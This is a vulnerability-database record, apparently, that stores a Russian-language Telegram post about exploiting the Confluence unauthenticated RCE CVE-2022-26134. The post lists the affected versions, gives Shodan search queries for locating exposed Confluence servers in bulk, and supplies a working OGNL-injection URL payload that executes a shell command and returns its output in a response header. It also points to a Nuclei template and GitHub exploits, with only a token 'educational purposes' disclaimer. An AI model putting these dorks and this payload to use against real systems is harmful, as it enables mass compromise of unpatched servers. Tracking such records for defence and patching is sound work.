{"uuid": "1f2de201-c723-408f-9785-7f9f9cf41a89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2022-26134", "type": "published-proof-of-concept", "source": "https://t.me/arm1tage/299", "content": "\u0415\u0429\u0415 \u041f\u0420\u041e\u0429\u0415\u041c \u0427\u0415\u041c \u0417\u0418\u041c\u0411\u0420\u0410\n\u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f Confluence RCE: CVE-2022-26134\n\n\u2014\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0432\u044b\u0437\u0432\u0430\u0442\u044c \u0420\u0421\u0415 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u043d\u0430 Confluence \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0438\u0445 \u0432\u0435\u0440\u0441\u0438\u0439:\nfrom 1.3.0 before 7.4.17, from 7.13.0 before 7.13.7, from 7.14.0 before 7.14.3, from 7.15.0 before 7.15.2, from 7.16.0 before 7.16.4, from 7.17.0 before 7.17.4, and from 7.18.0 before 7.18.1.\n\n\u2014\u0414\u043e\u0440\u043a\u0438 \u0434\u043b\u044f \u043f\u043e\u0438\u0441\u043a\u0430 \u0432 \u0448\u043e\u0434\u0430\u043d\u0435 \u0447\u0435\u0440\u0435\u0437 CLI:\nshodan search 'http.favicon.hash:-305179312' --fields ip_str,port\nshodan search 'http.component:\"atlassian confluence\"' --fields ip_str,port --limit 500\nshodan search 'http.title:\"Log In - Confluence\" 200' --fields ip_str,port --limit 500\nshodan search 'http.component:\"atlassian confluence\" http.title:\"Log In - Confluence\" 200' --fields ip_str,port --limit 500\nshodan search 'http.component:\"atlassian confluence\"' --fields ip_str,port --limit 500\nshodan search 'http.favicon.hash:-305179312 200' --fields ip_str,port --limit 500\n\n\u2014Nuclei \u0442\u0435\u043c\u043f\u043b\u0435\u0439\u0442 \u0441\u0440\u0430\u0437\u0443 \u0432\u044b\u0437\u044b\u0432\u0430\u0435\u0442 \u0420\u0421\u0415, \u043f\u043e\u0442\u043e\u043c\u0443 \u043d\u0435 \u043f\u0440\u0438\u0434\u0435\u0442\u0441\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0441\u0442\u043e\u0440\u043e\u043d\u043d\u0438\u043c\u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0438\u0442\u0430\u043c\u0438:\nNuclei Template\n\n\u2014PoC (\u043d\u0435 \u0437\u0430\u0431\u0443\u0434\u044c URL-\u044d\u043d\u043a\u043e\u0434\u0438\u0442\u044c \u0441\u0438\u043c\u0432\u043e\u043b\u044b \u043f\u0435\u0440\u0435\u0434 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u043e\u0439):\nhttp://example.com/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(\"id\").getInputStream(),\"utf-8\")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(\"X-Cmd-Response\",#a))}/\n\n\u2014\u0421\u0442\u0430\u0442\u044c\u044f:\n\u0421\u0442\u0430\u0442\u044c\u044f \n\n\u2014\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u043d\u0430 \u0433\u0438\u0442\u0445\u0430\u0431\u0435:\n\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 1 \n\u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 2 \n\n\u2014\u0422\u043e\u043b\u044c\u043a\u043e \u0432 \u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u043d\u044b\u0445 \u0446\u0435\u043b\u044f\u0445.\n\n\n#cve", "creation_timestamp": "2022-08-29T15:15:15.000000Z"}